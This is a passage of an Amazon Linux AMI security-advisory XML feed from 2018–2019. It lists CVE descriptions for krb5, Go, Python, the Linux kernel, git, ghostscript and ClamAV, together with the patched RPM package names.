Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5730:
MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to circumvent a DN containership check by supplying both a &quot;linkdn&quot; and &quot;containerdn&quot; database argument, or by supplying a DN string which is a left extension of a container DN string but is not hierarchically within the container DN.
1551082:
CVE-2018-5730 krb5: DN container check bypass by supplying special crafted data
CVE-2018-5729:
MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to cause a denial of service (NULL pointer dereference) or bypass a DN container check by supplying tagged data that is internal to the database module.
1551083:
CVE-2018-5729 krb5: null dereference in kadmind or DN container check bypass by supplying special crafted data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5729" title="" id="CVE-2018-5729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5730" title="" id="CVE-2018-5730" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server-ldap" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="34.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-34.44.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-34.44.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="34.44.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-34.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1130</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1130: important priority package update for golang</title><issued date="2018-12-14 18:50:00" /><updated date="2018-12-14 22:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16875:
The crypto/x509 package of Go before 1.10.6 and 1.11.x before 1.11.3 does not limit the amount of work performed for each chain verification, which might allow attackers to craft pathological inputs leading to a CPU denial of service. Go TLS servers accepting client certificates and TLS clients are affected.
1657565:
CVE-2018-16875 golang: crypto/x509 allows for denial of service via crafted TLS client certificate
CVE-2018-16874:
In Go before 1.10.6 and 1.11.x before 1.11.3, the &quot;go get&quot; command is vulnerable to directory traversal when executed with the import path of a malicious Go package which contains curly braces (both &#039;{&#039; and &#039;}&#039; characters). Specifically, it is only vulnerable in GOPATH mode, but not in module mode (the distinction is documented at https://golang.org/cmd/go/#hdr-Module_aware_go_get). The attacker can cause an arbitrary filesystem write, which can lead to code execution.
1657564:
CVE-2018-16874 golang: "go get" vulnerable to directory traversal via malicious package
CVE-2018-16873:
In Go before 1.10.6 and 1.11.x before 1.11.3, the &quot;go get&quot; command is vulnerable to remote code execution when executed with the -u flag and the import path of a malicious Go package, or a package that imports it directly or indirectly. Specifically, it is only vulnerable in GOPATH mode, but not in module mode (the distinction is documented at https://golang.org/cmd/go/#hdr-Module_aware_go_get). Using custom domains, it&#039;s possible to arrange things so that a Git repository is cloned to a folder named &quot;.git&quot; by using a vanity import path that ends with &quot;/.git&quot;. If the Git repository root contains a &quot;HEAD&quot; file, a &quot;config&quot; file, an &quot;objects&quot; directory, a &quot;refs&quot; directory, with some work to ensure the proper ordering of operations, &quot;go get -u&quot; can be tricked into considering the parent directory as a repository root, and running Git commands on it. That will use the &quot;config&quot; file in the original Git repository root for its configuration, and if that config file contains malicious commands, they will execute on the system running &quot;go get -u&quot;.
1657563:
CVE-2018-16873 golang: "go get" command vulnerable to RCE via import of malicious package
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16873" title="" id="CVE-2018-16873" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16874" title="" id="CVE-2018-16874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16875" title="" id="CVE-2018-16875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.10.6" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.10.6-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.10.6" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.10.6-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.10.6" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.10.6-1.47.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.10.6-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1132</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1132: medium priority package update for python34 python36</title><issued date="2018-12-20 00:01:00" /><updated date="2019-01-12 03:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14647:
Python&#039;s elementtree C accelerator failed to initialise Expat&#039;s hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by contructing an XML document that would cause pathological hash collisions in Expat&#039;s internal data structures, consuming large amounts CPU and RAM.
1631822:
CVE-2018-14647 python: Missing salt initialization in _elementtree.c module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14647" title="" id="CVE-2018-14647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.9-1.40.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.7" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.7-1.10.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.7-1.10.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.7" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.7-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1133</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1133: medium priority package update for kernel</title><issued date="2018-12-20 00:02:00" /><updated date="2018-12-20 23:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19407:
A NULL pointer dereference security flaw was found in the Linux kernel in the vcpu_scan_ioapic() function in arch/x86/kvm/x86.c. This allows local users with certain privileges to cause a denial of service via a crafted system call to the KVM subsystem.
1652656:
CVE-2018-19407 kernel: kvm: NULL pointer dereference in vcpu_scan_ioapic in arch/x86/kvm/x86.c
CVE-2018-18710:
An issue was discovered in the Linux kernel through 4.19. An information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c could be used by local attackers to read kernel memory because a cast from unsigned long to int interferes with bounds checking.
1645140:
CVE-2018-18710 kernel: Information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c
CVE-2018-16862:
A security flaw was found in the Linux kernel in a way that the cleancache subsystem clears an inode after the final file truncation (removal). The new file created with the same inode may contain leftover pages from cleancache and the old file data instead of the new one.
1649017:
CVE-2018-16862 kernel: cleancache: Infoleak of deleted files after reuse of old inodes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16862" title="" id="CVE-2018-16862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18710" title="" id="CVE-2018-18710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19407" title="" id="CVE-2018-19407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.88-72.73.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.88-72.73.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.88" release="72.73.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.88-72.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1136</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1136: important priority package update for git</title><issued date="2018-12-20 00:03:00" /><updated date="2018-12-20 23:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19486:
Git before 2.19.2 on Linux and UNIX executes commands from the current working directory (as if &#039;.&#039; were at the end of $PATH) in certain cases involving the run_command() API and run-command.c, because there was a dangerous change from execvp to execv during 2017.
1653143:
CVE-2018-19486 git: Improper handling of PATH allows for commands to be executed from the current directory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19486" title="" id="CVE-2018-19486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-all" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.5-1.60.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.5-1.60.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.5-1.60.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.5-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1137</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1137: important priority package update for ghostscript</title><issued date="2018-12-20 00:04:00" /><updated date="2018-12-20 23:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16509:
It was discovered that the ghostscript /invalidaccess checks fail under certain conditions. An attacker could possibly exploit this to bypass the -dSAFER protection and, for example, execute arbitrary shell commands via a specially crafted PostScript document.
1619748:
CVE-2018-16509 ghostscript: /invalidaccess bypass after failed restore (699654)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16509" title="" id="CVE-2018-16509" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.26.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.26.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.26.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1145</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1145: medium priority package update for kernel</title><issued date="2019-01-09 22:47:00" /><updated date="2019-01-12 03:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20169:
An issue was discovered in the Linux kernel before 4.19.9. The USB subsystem mishandles size checks during the reading of an extra descriptor, related to __usb_get_extra_descriptor in drivers/usb/core/usb.c.
1660385:
CVE-2018-20169 kernel: Mishandled size checks during the reading of an extra descriptor
CVE-2018-14625:
A flaw was found where an attacker may be able to have an uncontrolled read to kernel-memory from within a vm guest. A race condition between connect() and close() function may allow an attacker using the AF_VSOCK protocol to gather a 4 byte information leak or possibly impersonate AF_VSOCK messages destined to other clients or leak kernel memory.
1619846:
CVE-2018-14625 kernel: use-after-free Read in vhost_transport_send_pkt
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14625" title="" id="CVE-2018-14625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20169" title="" id="CVE-2018-20169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.88-72.76.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.88-72.76.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.88" release="72.76.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.88-72.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1146</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1146: low priority package update for clamav</title><issued date="2019-01-09 22:56:00" /><updated date="2019-01-12 03:28:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15378:
CVE-2018-14682:
An issue was discovered in mspack/chmd.c in libmspack before 0.7alpha. There is an off-by-one error in the TOLOWER() macro for CHM decompression.
1610941:
